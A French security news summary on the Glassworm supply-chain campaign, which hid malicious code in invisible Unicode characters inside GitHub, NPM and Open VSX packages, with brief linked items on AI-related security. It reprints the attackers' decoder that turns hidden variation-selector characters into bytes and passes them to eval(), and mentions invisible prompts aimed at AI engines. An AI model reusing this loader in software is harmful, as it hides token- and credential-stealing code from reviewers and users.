L'attaque de la chaîne d'approvisionnement utilise des caractères Unicode invisibles pour contourner la détection.

Des chercheurs en sécurité d'Aikido Security ont découvert une attaque de chaîne d'approvisionnement utilisant du code Unicode invisible pour dissimuler des fonctions malveillantes dans des paquets téléversés sur GitHub, NPM et Open VSX. Le groupe d'attaquants, surnommé Glassworm, a téléversé 151 paquets malveillants sur GitHub du 3 au 9 mars 2026.
Fonctionnement du code invisible
Les paquets malveillants utilisent des caractères Unicode provenant des zones d'usage public (également appelées accès d'usage public) qui sont invisibles lorsqu'ils sont visualisés dans les éditeurs, terminaux et interfaces de revue de code. Bien que la majeure partie du code semble normale, les fonctions et charges utiles malveillantes sont rendues à l'aide de ces caractères invisibles, rendant les revues manuelles de code et les défenses traditionnelles inefficaces.
Les caractères Unicode invisibles représentent chaque lettre de l'alphabet américain lorsqu'ils sont traités par les ordinateurs, mais s'affichent comme des espaces blancs ou des lignes vides pour les humains. Les interpréteurs JavaScript peuvent lire et exécuter ces caractères comme du code normal.
Implémentation technique
Dans un paquet analysé, les attaquants ont encodé une charge utile malveillante à l'aide de caractères invisibles. Le code comprend une fonction de décodage qui extrait les octets cachés et les transmet à eval() :
const s = v => [...v].map(
w => (
w = w.codePointAt(0),
w >= 0xFE00 && w <= 0xFE0F ? w - 0xFE00 :
w >= 0xE0100 && w <= 0xE01EF ? w - 0xE0100 + 16 :
null
)
).filter(n => n !== null);
eval(Buffer.from(s(``)).toString('utf-8'));
La chaîne entre backtiches passée à s() apparaît vide dans les visualiseurs mais contient des caractères invisibles qui se décodent en une charge utile malveillante complète. Dans des incidents précédents, les charges utiles décodées récupéraient et exécutaient des scripts de deuxième étape en utilisant Solana comme canal de livraison pour voler des jetons, identifiants et secrets.
Caractéristiques de l'attaque
Les paquets malveillants sont particulièrement difficiles à détecter car :
- Les parties visibles du code sont de haute qualité et réalistes
- Les modifications environnantes incluent des ajustements de documentation, des incréments de version, de petites refontes et des corrections de bogues
- Les changements sont stylistiquement cohérents avec les projets ciblés
- Les chercheurs soupçonnent que des LLM sont utilisés pour générer des paquets convaincants et légitimes
Cette technique Unicode a été utilisée pour la première fois en 2024 pour dissimuler des invites malveillantes fournies aux moteurs d'IA, et a depuis été adaptée pour des attaques de logiciels malveillants traditionnels. Les 151 paquets détectés représentent probablement une petite fraction de la campagne, car beaucoup ont été supprimés depuis le téléversement initial.
📖 Lire la source complète : HN AI Agents
👀 See Also

Approche de sécurité OpenClaw utilisant le routeur LLM et le partage privé zrok
Un développeur partage son approche pour exécuter OpenClaw et un routeur LLM dans un environnement VM+Kubernetes avec une seule commande, en abordant les préoccupations de sécurité en injectant les clés API au niveau du routeur et en utilisant zrok pour le partage privé au lieu des jetons traditionnels des applications de messagerie.

Anthropic rapporte des attaques de distillation à l'échelle industrielle par des laboratoires d'IA chinois sur Claude.
Anthropic a détecté trois entreprises chinoises d'IA—DeepSeek, Moonshot et MiniMax—créant plus de 24 000 comptes frauduleux pour générer plus de 16 millions d'échanges avec Claude, extrayant ses capacités de raisonnement par des attaques de distillation systématiques.

Extension VS Code Claude Code divulgue l'état de sélection entre fichiers fermés et nouvelles sessions
Un bogue dans l'extension VS Code de Claude Code met en cache l'état de sélection des fichiers même après la fermeture du fichier, exposant des données sensibles (par exemple, les clés de rôle de service Supabase) à une toute nouvelle session CLI. Étapes de reproduction complètes et problème GitHub #58886.

Le proxy McpVanguard bloque l'exfiltration des données de compétence OpenClaw
Un développeur a créé McpVanguard, un proxy qui s'interpose entre les agents d'IA et leurs outils pour bloquer les chaînes d'appels malveillantes comme l'exfiltration de données, en réponse à la découverte par Cisco de compétences OpenClaw effectuant des vols de données silencieux. Il utilise la correspondance de motifs, l'évaluation de l'intention sémantique et la détection des chaînes comportementales.